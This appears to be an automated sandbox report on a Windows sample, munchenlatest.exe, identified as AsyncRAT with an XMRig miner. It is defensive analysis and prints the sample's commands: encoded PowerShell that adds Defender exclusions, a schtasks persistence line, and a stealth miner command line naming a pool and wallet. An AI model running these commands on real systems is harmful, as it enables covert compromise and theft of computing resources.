Analysis Overview
SHA256
14aa5b0fb58dd616085d10d2b33707f1bb765c2e9e67ec5c2a050689a0206e01
Threat Level: Known bad
The file munchenlatest.exe was found to be: Known bad.
Malicious Activity Summary
xmrig
AsyncRat
Xmrig family
Asyncrat family
XMRig Miner payload
Async RAT payload
Command and Scripting Interpreter: PowerShell
Drops file in Drivers directory
Checks computer location settings
Executes dropped EXE
Clipboard Data
Unsecured Credentials: Credentials In Files
Reads user/profile data of web browsers
Loads dropped DLL
Obfuscated Files or Information: Command Obfuscation
Accesses cryptocurrency files/wallets, possible credential harvesting
Looks up external IP address via web service
Suspicious use of SetThreadContext
UPX packed file
Enumerates processes with tasklist
Unsigned PE
Enumerates physical storage devices
System Location Discovery: System Language Discovery
System Network Configuration Discovery: Wi-Fi Discovery
Event Triggered Execution: Netsh Helper DLL
Uses Task Scheduler COM API
Detects videocard installed
Gathers system information
Views/modifies file attributes
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Scheduled Task/Job: Scheduled Task
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-11-05 08:04
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-05 08:03
Reported
2024-11-05 08:06
Platform
win7-20240903-en
Max time kernel
147s
Max time network
131s
Command Line
Signatures
AsyncRat
Asyncrat family
Xmrig family
xmrig
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\rundii32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\rundii.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Core Sound Service.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\splwow64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\rundii.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Users\Admin\services64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe | N/A |
Loads dropped DLL
Obfuscated Files or Information: Command Obfuscation
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2968 set thread context of 1944 | N/A | C:\Windows\System32\conhost.exe | C:\Windows\explorer.exe |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\rundii32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\munchenlatest.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\conhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\conhost.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\munchenlatest.exe
"C:\Users\Admin\AppData\Local\Temp\munchenlatest.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAbABxACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGUAdwB1ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAVABoAGUAIABwAHIAbwBnAHIAYQBtACAAYwBhAG4AJwAnAHQAIABzAHQAYQByAHQAIABiAGUAYwBhAHUAcwBlACAATQBTAFYAQwBQADEANAAwAC4AZABsAGwAIABpAHMAIABtAGkAcwBzAGkAbgBnACAAZgByAG8AbQAgAHkAbwB1AHIAIABjAG8AbQBwAHUAdABlAHIALgAgAFQAcgB5ACAAcgBlAGkAbgBzAHQAYQBsAGwAaQBuAGcAIAB0AGgAZQAgAHAAcgBvAGcAcgBhAG0AIAB0AG8AIABmAGkAeAAgAHQAaABpAHMAIABwAHIAbwBiAGwAZQBtAC4AJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHQAYgBlACMAPgA="
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHkAeABlACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHAAYgB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdQBwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAaABzACMAPgA="
C:\Users\Admin\AppData\Local\Temp\rundii32.exe
"C:\Users\Admin\AppData\Local\Temp\rundii32.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAbQB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAcwB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAdgBoACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAcABjACMAPgA="
C:\Users\Admin\AppData\Local\Temp\rundii.exe
"C:\Users\Admin\AppData\Local\Temp\rundii.exe"
C:\Users\Admin\AppData\Local\Temp\splwow64.exe
"C:\Users\Admin\AppData\Local\Temp\splwow64.exe"
C:\Users\Admin\AppData\Local\Temp\Core Sound Service.exe
"C:\Users\Admin\AppData\Local\Temp\Core Sound Service.exe"
C:\Users\Admin\AppData\Local\Temp\rundii.exe
"C:\Users\Admin\AppData\Local\Temp\rundii.exe"
C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\splwow64.exe"
C:\Windows\System32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\services64.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\services64.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\System32\cmd.exe
"cmd" cmd /c "C:\Users\Admin\services64.exe"
C:\Users\Admin\services64.exe
C:\Users\Admin\services64.exe
C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\services64.exe"
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:14433 --user=83bM5DoDitniDg2ooQitzWKzapHhSvJmL8kn1dDcr4ST6wU8U6Cj7TN3FRXWJK3fDXNQBRf5TQ5qN2o1aCxi7vrxSi5T26L.ObamaNet --pass=johnlovesbbc --cpu-max-threads-hint=60 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=100 --tls --cinit-stealth
C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "/sihost64"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | xmr-eu1.nanopool.org | udp |
| FR | 141.94.23.83:14433 | xmr-eu1.nanopool.org | tcp |
Files
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 853304004f5368010244c69bf948edba |
| SHA1 | fdbee2864e52050c00a8b3fbd3baa600904659b1 |
| SHA256 | e8ebdb06f6936177081ac7201245a83954bf7842841a78a88fada84f312ed941 |
| SHA512 | 405cb47fb2b124075d99eb4ec74789b3946b051c65f203157d4d5240a8a793215a5a510db6e2a366e9a255d563251ed94efc52f9c2020695df02087fd7169ccf |
\Users\Admin\AppData\Local\Temp\rundii32.exe
| MD5 | cac59c4e6752c4c2cecb29b5c2f9f9ac |
| SHA1 | bf9ee5e449ce94c327d6743b62feca2c85a43841 |
| SHA256 | 9d08b1a5c70870efecda2594ee777e4b18771eefb34d540109b1c45926fbf24c |
| SHA512 | 5b8aba311730202135afb4c03988f113801850e689954fbc004aa04a25d6cda8a2da2ecc63c476c620a6a2646c17241ef5780a42cb6001b1de30ec6379099431 |
C:\Users\Admin\AppData\Local\Temp\splwow64.exe
| MD5 | bfc16c7476c61d4b5a004ba97f5eccc3 |
| SHA1 | 7a136debf77f394b0412d979c73e4f8af8587396 |
| SHA256 | 1b343c5e48c01f376cc3887fa7000b0e69eb1894735c89b9c8d0ee1597893530 |
| SHA512 | 3766067704a96a8bef769d907d39368ed3a25bba60af32b0087ae0a411c48735741af9a804926cae93eb86f520cfbbbbbd0ebb09242977d0f07179d1a6dba17e |
C:\Users\Admin\AppData\Local\Temp\Core Sound Service.exe
| MD5 | 180c04a828909e35bf3d461c0eb827cc |
| SHA1 | e692112d425fc5b6adc5c7bfa1e66757bb8f8c11 |
| SHA256 | c7b5bccc8f1089f9ea3f5fb3a6dd2843bd27c2994a59d770fd4a81cc472e499b |
| SHA512 | 6dda55954d148efad2615d26a85eebef3e3ab86de484a713b1c21e4c446b652aa8ccdc7a9c49e82110632019ad87a8365a418df2e0091bcc5235a1c0f240ea04 |
C:\Users\Admin\AppData\Local\Temp\rundii.exe
| MD5 | 1f2da62acedae32686c066546b569b04 |
| SHA1 | f83b6681ef62b74a5c973f0b8bd3c89aecfd11e3 |
| SHA256 | bd40d7b888d1f01c4e45040fe80e41a1d812d3ee3e932d84f7f3540ba936c5e9 |
| SHA512 | 54bce8ec27fbb0ac6768e75f68af4e233d324ed59ec8bca19a1e738917389642e611a58a3231769eeb39a88f7e3e78cc17e09a109ab809a3bb195e1b34327bb9 |
C:\Users\Admin\AppData\Local\Temp\_MEI28122\api-ms-win-crt-convert-l1-1-0.dll
| MD5 | e813f085bb974077fd1ff02f859c19ff |
| SHA1 | bdca1e7ca980373cfe93e2c07eae4e5f14fa92f8 |
| SHA256 | 9818a2278ce39e0ecffa9bd2502fed106f9f2c6acaf801fb7d7df80606abc2ab |
| SHA512 | b3b4b0e749dd04e698a26a82e2daa21e91d50896a648310253d69feb33585fd91e9c54698e33e8b9843642c865123e60a1cfaf3f2af46827afd38cd87a1b3e85 |
memory/2976-103-0x0000000001370000-0x00000000013DC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI28122\api-ms-win-core-localization-l1-2-0.dll
| MD5 | 7859eb82f99fa849ad33909cdae8d493 |
| SHA1 | b56512906e9642a99dcb7eb7373fa8ad5990019e |
| SHA256 | 7c7a3c0d04519d1656a50604b1052850e9d937b6c3e973d564a6b2f9495ae05f |
| SHA512 | a6548d6d70e8c22638d0619b4eaafead5289953c013d2e95477fb34316b788cd756217426dd36582b49ba5fd93702c4ec4590cabbe47d79156516fff5fcdb149 |
C:\Users\Admin\AppData\Local\Temp\_MEI28122\api-ms-win-core-processthreads-l1-1-1.dll
| MD5 | 54d6888e154d8fd2b35c7a7b8dcaa84b |
| SHA1 | 883cca38ff0d43ab86b344ec7a490515f594a060 |
| SHA256 | 9e2744bc1f7fa7015881c5edc7f14b031472ca1a08c57c38325cbf7736890be0 |
| SHA512 | 0b2f048b2b5f1083d8e65ddb3278a4340eab05e41d9a08b4337f4cdf6b5afe540cda6c3b87462a2de3bb9ff2fc2ab6d95631913c6e1e02335a42812d7ef681dd |
C:\Users\Admin\AppData\Local\Temp\_MEI28122\api-ms-win-core-file-l1-2-0.dll
| MD5 | 4e7b40f3c457212792ed796d5ceb7c0f |
| SHA1 | dedb78bbcc0ae5e5ab1cb15eec15e4f3300bc32e |
| SHA256 | 11f046a0bd6ea6bbae9355e7b3f6ca42adae2a5c7f41f30fcb497baec80d69ad |
| SHA512 | 3f8fd4171d48cf8f9a37fad1b42d79bb9b8cf8c08d0e594aebc6425c1b5d981db542a4a57bf71d5fd936641755c1c8548bc77ead99aff142da0da10e03b1c135 |
C:\Users\Admin\AppData\Local\Temp\_MEI28122\api-ms-win-core-timezone-l1-1-0.dll
| MD5 | 9ec9658795a82a6f689dbbf9b14d56a8 |
| SHA1 | 90498e0259ec68959e0ca9b7dfb6e94f24a192e5 |
| SHA256 | e25a1056beef787a1857541714d3ced677bc29257ddb70643a3f332d7081e24b |
| SHA512 | ddab3d638f6b685ecf438870b3b6f1d7dd56319ed4748cbca20d54863970ce1e4e5edac4b7df5b63712fa63b1214f9477360f6f1dc7ec28feb807d3a3eb6457a |
C:\Users\Admin\AppData\Local\Temp\_MEI28122\api-ms-win-core-synch-l1-2-0.dll
| MD5 | c959ff1b1b733abd45125d6392a4f0fc |
| SHA1 | 3ce203f1e864e313ae0025acf776429a7d440150 |
| SHA256 | 0c764d9856bbedd7ea95e3427790fdb0c3c270c1a97fa3e0d085d77bd684537d |
| SHA512 | b71f6a4130ebb122506ecbd86ea5ddb73ab5bd6c6bac0caab9fff2e908b998a0cf8e45a95af14060186e114701141980192ad506a1365eaaa8364f6e649d0e88 |
C:\Users\Admin\AppData\Local\Temp\_MEI28122\api-ms-win-crt-environment-l1-1-0.dll
| MD5 | 61d0f3d97c1a7af5314c39c80c838796 |
| SHA1 | 06f7971574f67f34f61ff1a9a54b60221070d04b |
| SHA256 | 0bfca5c3f717d1373e3faf94dd3d010a6976ae2d57cb35a197c5bbac80724b10 |
| SHA512 | 9651f768c448fbb878b7600cbd80c001b7d7ea7dbec04b4ec50a637939787591a484aafd7ea5c2e0c77447229970b3bf1b6175e552a9f2a1024272895ed04a75 |
C:\Users\Admin\AppData\Local\Temp\_MEI28122\api-ms-win-crt-filesystem-l1-1-0.dll
| MD5 | ef655e2df6aa03c6aa11679e1601cbd1 |
| SHA1 | 435082a01784be95f473095e4f0499f5c8c1e6b1 |
| SHA256 | 8ec445f97325160b291ca8046c1cba997067e42e4095f724bda9b43ae13bfed7 |
| SHA512 | 3a1ef8c4bfe553de57d59dc2c2009e65e69a8dca914d8d2396495b888be0859e78508e4000a39a482c7116fadfe1b8d143b9aaa2c97785a0954afd8b8b81a23f |
C:\Users\Admin\AppData\Local\Temp\_MEI28122\api-ms-win-crt-locale-l1-1-0.dll
| MD5 | 3089adc12784121cdba1e6b550efd6c9 |
| SHA1 | eaa9b3760d7b25590cea4564d5dc81c86442d336 |
| SHA256 | 25420d595989c800fe5f274aebf32e74f2e670e1d08bc5336ed67de9e1b1d62c |
| SHA512 | 62d8c2f07c8670e5135b8f092b533272c87e38191ceefe03c2e6e707fa71997a68b4e00d68020aa2cf3ef6e4de1d6c7a48f1eadcd409bf6c3889f635a1f89696 |
\Users\Admin\AppData\Local\Temp\_MEI28122\api-ms-win-crt-math-l1-1-0.dll
| MD5 | 8b0fe0eb8a838ea1524b9244679136ed |
| SHA1 | a32b845db57f66845e9d5f428a871eecc8900e57 |
| SHA256 | 8324e803620d6c7a57d644efb951b5b811d258f85195f71404198456d6a20da6 |
| SHA512 | a1861b8098855c1833e1e080df325ae1078ebb8918d658c7379f24f982560ab420d858be6c19353a79cbac6a4378bc23e7636f7fb7d517121cd82d924e8dcfc2 |
C:\Users\Admin\AppData\Local\Temp\_MEI28122\api-ms-win-crt-runtime-l1-1-0.dll
| MD5 | 5a04d702c462ac7b564f5da8bb35a2a0 |
| SHA1 | b8ed4c5710fb8c8ed81617c11b71b22cd57d5325 |
| SHA256 | 0210604c8dd1e9aa8c2458e2734deff9d77897d7dfce42bc0f28ad62d265bd9b |
| SHA512 | 9986cb05ca1203c086e7d4f0c4a30c6c7394d6fc4ae3908b25867f387bf61a393b054c3a9e13ba9a0d103c5b1d4be874b81dc314be611457b3bd69113d91bd3c |
C:\Users\Admin\AppData\Local\Temp\_MEI28122\api-ms-win-crt-stdio-l1-1-0.dll
| MD5 | 41ba9068fd432758ae08d80470cff8c8 |
| SHA1 | 9de3cff0d99e3baef7ff1f45187c414c5a803a9f |
| SHA256 | 3c4f7104e8257b64b4a856c06dee4ab12e35a5bdfe361b2fc4a04a564454010b |
| SHA512 | 1d50207493b3f3a3834ef09e4f78bb03d82f2760106842e7cb57742741a1182917f3e975244543e0cef63c16ebad147e3e8b16e18d14c63dc3c906670cee7545 |
C:\Users\Admin\AppData\Local\Temp\_MEI28122\api-ms-win-crt-string-l1-1-0.dll
| MD5 | 30a6e4b8fe2d9b2df594e809cbbac128 |
| SHA1 | f30559b281cb679bb406bfe42f1f501a376bca23 |
| SHA256 | f8bbf236334c083682cd710632005cb6a5a3b60086d05946827eb8ca45e24b8d |
| SHA512 | 337949c3b5a6e13ad3aae93294c5f97b6271f639e3296d4aab8ac546f4417c79c1906f92ab20955ca451d5317ba7fe64eed0c7a79309e337b20516283987c2e0 |
C:\Users\Admin\AppData\Local\Temp\_MEI28122\api-ms-win-crt-time-l1-1-0.dll
| MD5 | 9e4620c44403dfb42d3badd40ddef313 |
| SHA1 | 0696df5c3f71aed9763408d2ab8ff8cbfd1d1a41 |
| SHA256 | 5e2f92250a058802b4a72b93226616f390044c6bfe34a04b5533773806f7072e |
| SHA512 | 5b96b4775c5fae03ba0e96d2d0f5d2fb1b4bcb05014a47686b378e11659b53a518bb56acf0d3d076ec73eadb1b639c07a6be969bd68c34f3f3ca77451f160001 |
C:\Users\Admin\AppData\Local\Temp\_MEI28122\python310.dll
| MD5 | 4a6afa2200b1918c413d511c5a3c041c |
| SHA1 | 39ca3c2b669adac07d4a5eb1b3b79256cfe0c3b3 |
| SHA256 | bec187f608507b57cf0475971ba646b8ab42288af8fdcf78bce25f1d8c84b1da |
| SHA512 | dbffb06ffff0542200344ea9863a44a6f1e1b783379e53df18580e697e8204d3911e091deb32a9c94b5599cdd54301b705b74e1f51104151cf13b89d57280a20 |
memory/1464-137-0x000007FEF4800000-0x000007FEF4C66000-memory.dmp
\Users\Admin\AppData\Local\Temp\_MEI28122\api-ms-win-crt-heap-l1-1-0.dll
| MD5 | 6a32b4a457bc7eb515ed59dba1114897 |
| SHA1 | 7a69af1660d76285183754c7d1b29d81968d3960 |
| SHA256 | da3fcc1283339ddd4504e48a63f75e4f8ac8f30ce48384e7c643b80b372bfcd6 |
| SHA512 | 7c5968f24940e35eae221f6b17b44aef51f751d685d74e79aa247d5dfd95d8a8d3da3f7ce95a2c15764c5005be05fec22ec7a7c61617444acea353bf7931d19a |
\Users\Admin\AppData\Local\Temp\_MEI28122\api-ms-win-core-file-l2-1-0.dll
| MD5 | 80ab22c6d0250257b61b217822aa5d7c |
| SHA1 | e659198c8045d918384e276783507d77ce297cd6 |
| SHA256 | d56b63aefedc21372a5d75918032e98f3e4c564733d4838a5b442351e32a300b |
| SHA512 | 94e61803a318fde919ba18a20cbdfae1250a844c2266311bc99cfcbb22757bd43b5279567f24bae32192dc0b9fbb0b20d10db3b3f19014708af7e8f89a1c96a4 |
\Users\Admin\AppData\Local\Temp\_MEI28122\ucrtbase.dll
| MD5 | 6914ef1fad4393589072e06a4630d255 |
| SHA1 | 028669a97db7c007441ae3330767968544eba3c6 |
| SHA256 | 81c9b5d54e1b1da192f4a167f7e06439e36c670a99af2f1ef056e0959e85de57 |
| SHA512 | b682c749d6f2ed56d69ff4f8520899638fa6f436b2af8241db686ccbc606d23d4e77721222ab7ad863336d5e5aafa1033b94f550198a1a083af5811ce8dec004 |
memory/2812-139-0x000000013F270000-0x000000013F294000-memory.dmp
memory/1464-140-0x000000013F270000-0x000000013F294000-memory.dmp
memory/2996-141-0x00000000001F0000-0x0000000000410000-memory.dmp
memory/2996-142-0x000000001B460000-0x000000001B680000-memory.dmp
memory/1464-143-0x000000013F270000-0x000000013F294000-memory.dmp
memory/2812-186-0x000000013F270000-0x000000013F294000-memory.dmp
\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
| MD5 | cfe1ab1913bbd166bca480eb4e5d1364 |
| SHA1 | a1e87dd6018f244966d875054330640f6e2d9c00 |
| SHA256 | db41aa5958994bce76ea6b86083cbf634760a5b1ccdeec9c2387ec6bc33915f6 |
| SHA512 | 978a65def8eadc595d34752d54f76d8638bf133d09295e763f7b42a2bd342ed334fc0b1ae3680f0bff17f1899ecb42cf50e827dd4c91d4b16bdaadcdf41e3ae4 |
memory/1944-204-0x0000000140000000-0x0000000140786000-memory.dmp
memory/1944-229-0x0000000140000000-0x0000000140786000-memory.dmp
memory/1944-231-0x0000000140000000-0x0000000140786000-memory.dmp
memory/1944-228-0x000007FFFFFD7000-0x000007FFFFFD8000-memory.dmp
memory/1944-222-0x0000000140000000-0x0000000140786000-memory.dmp
memory/1944-220-0x0000000140000000-0x0000000140786000-memory.dmp
memory/1944-218-0x0000000140000000-0x0000000140786000-memory.dmp
memory/1944-216-0x0000000140000000-0x0000000140786000-memory.dmp
memory/1944-214-0x0000000140000000-0x0000000140786000-memory.dmp
memory/1944-212-0x0000000140000000-0x0000000140786000-memory.dmp
memory/1944-208-0x0000000140000000-0x0000000140786000-memory.dmp
memory/1944-206-0x0000000140000000-0x0000000140786000-memory.dmp
memory/1944-232-0x0000000000370000-0x0000000000390000-memory.dmp
memory/1944-226-0x0000000140000000-0x0000000140786000-memory.dmp
memory/1944-224-0x0000000140000000-0x0000000140786000-memory.dmp
memory/1944-210-0x0000000140000000-0x0000000140786000-memory.dmp
memory/1944-234-0x0000000140000000-0x0000000140786000-memory.dmp
memory/1944-236-0x0000000140000000-0x0000000140786000-memory.dmp
memory/1944-235-0x0000000140000000-0x0000000140786000-memory.dmp
memory/1944-233-0x0000000140000000-0x0000000140786000-memory.dmp
memory/1944-237-0x0000000140000000-0x0000000140786000-memory.dmp
memory/1944-238-0x0000000140000000-0x0000000140786000-memory.dmp
memory/1976-239-0x0000000000060000-0x0000000000066000-memory.dmp
memory/1976-240-0x0000000001C60000-0x0000000001C66000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-05 08:03
Reported
2024-11-05 08:06
Platform
win10v2004-20241007-en
Max time kernel
148s
Max time network
150s
Command Line
Signatures
AsyncRat
Asyncrat family
Xmrig family
xmrig
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\attrib.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\rundii.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\attrib.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\munchenlatest.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\rundii32.exe | N/A |
Clipboard Data
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\rundii32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\rundii.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\splwow64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Core Sound Service.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\rundii.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\_MEI39882\rar.exe | N/A |
| N/A | N/A | C:\Users\Admin\services64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses cryptocurrency files/wallets, possible credential harvesting
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Obfuscated Files or Information: Command Obfuscation
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 872 set thread context of 4676 | N/A | C:\Windows\System32\conhost.exe | C:\Windows\explorer.exe |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
